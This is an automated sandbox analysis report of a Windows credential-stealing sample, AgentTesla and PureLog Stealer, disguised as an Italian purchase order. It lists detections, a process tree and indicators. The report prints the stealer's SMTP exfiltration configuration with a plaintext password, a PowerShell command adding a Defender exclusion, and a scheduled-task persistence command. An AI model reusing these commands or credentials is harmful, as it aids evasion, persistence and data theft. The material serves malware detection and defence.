Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PUK ITALIA PO 120610549.EXE.exe

Overview

General Information

Sample name:PUK ITALIA PO 120610549.EXE.exe
Analysis ID:1409106
MD5:876bdd759d990110a2bbd617b0f2c549
SHA1:dec55c0273518038e0f2cdabe94d0d33e6fb1704
SHA256:066beb79d6fc244e4fc3db3cae1af40749798a52f6b5796f14e3612e1498bf73
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PUK ITALIA PO 120610549.EXE.exe (PID: 6104 cmdline: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe MD5: 876BDD759D990110A2BBD617B0F2C549)
    • powershell.exe (PID: 7284 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7508 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7324 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • FNOqSQ.exe (PID: 7584 cmdline: C:\Users\user\AppData\Roaming\FNOqSQ.exe MD5: 876BDD759D990110A2BBD617B0F2C549)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.alltoursegypt.com", "Username": "admin@alltoursegypt.com", "Password": "OPldome23#12klein"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x34edb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x34f4d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x34fd7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x35069:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x350d3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x35145:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x351db:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x3526b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
      00000007.00000002.1690016809.00000000052B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 9 entries
          SourceRuleDescriptionAuthorStrings
          7.2.FNOqSQ.exe.2c07308.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              7.2.FNOqSQ.exe.52b0000.12.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                7.2.FNOqSQ.exe.52b0000.12.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 19 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentImage: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentProcessId: 6104, ParentProcessName: PUK ITALIA PO 120610549.EXE.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, ProcessId: 7284, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentImage: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentProcessId: 6104, ParentProcessName: PUK ITALIA PO 120610549.EXE.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, ProcessId: 7284, ProcessName: powershell.exe
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.254.186.165, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Initiated: true, ProcessId: 6104, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentImage: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentProcessId: 6104, ParentProcessName: PUK ITALIA PO 120610549.EXE.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, ProcessId: 7324, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentImage: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentProcessId: 6104, ParentProcessName: PUK ITALIA PO 120610549.EXE.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe, ProcessId: 7284, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentImage: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, ParentProcessId: 6104, ParentProcessName: PUK ITALIA PO 120610549.EXE.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp, ProcessId: 7324, ProcessName: schtasks.exe
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.alltoursegypt.com", "Username": "admin@alltoursegypt.com", "Password": "OPldome23#12klein"}
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeReversingLabs: Detection: 65%
                    Source: PUK ITALIA PO 120610549.EXE.exeReversingLabs: Detection: 65%
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: RIoz.pdb source: PUK ITALIA PO 120610549.EXE.exe, FNOqSQ.exe.0.dr
                    Source: Binary string: RIoz.pdbSHA2563 source: PUK ITALIA PO 120610549.EXE.exe, FNOqSQ.exe.0.dr
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.ipify.org
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4120310835.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4120310835.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4120310835.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.&
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000006FED000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4130479003.000000000AD20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/01
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000006FED000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4130479003.000000000AD20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126180855.00000000058D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.itcfonts.b
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000006FED000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000006FED000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, NmHr1WHWKO.cs.Net Code: lhg
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, NmHr1WHWKO.cs.Net Code: lhg
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, NmHr1WHWKO.cs.Net Code: lhg
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeJump to behavior

                    System Summary

                    barindex
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_024CDCB40_2_024CDCB4
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_0718E7E80_2_0718E7E8
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_0718E4A00_2_0718E4A0
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_071822900_2_07182290
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_0718F0B80_2_0718F0B8
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_07186F580_2_07186F58
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_07186F480_2_07186F48
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_07184EE00_2_07184EE0
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_071853180_2_07185318
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_07186B100_2_07186B10
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_07186B200_2_07186B20
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_071822800_2_07182280
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_0718781F0_2_0718781F
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_071878300_2_07187830
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_076DD3B10_2_076DD3B1
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_076D75CA0_2_076D75CA
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_076D28410_2_076D2841
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_076DAB8A0_2_076DAB8A
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_076D37900_2_076D3790
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_076D59D00_2_076D59D0
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D6C1100_2_09D6C110
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D691B10_2_09D691B1
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D6ECF00_2_09D6ECF0
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D638600_2_09D63860
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D69FD00_2_09D69FD0
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D66BA80_2_09D66BA8
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D6E6100_2_09D6E610
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0108DCB47_2_0108DCB4
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_050581547_2_05058154
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_050500067_2_05050006
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_050500407_2_05050040
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0505B2C07_2_0505B2C0
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0509C6E07_2_0509C6E0
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0509C6D07_2_0509C6D0
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_073622907_2_07362290
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_073653187_2_07365318
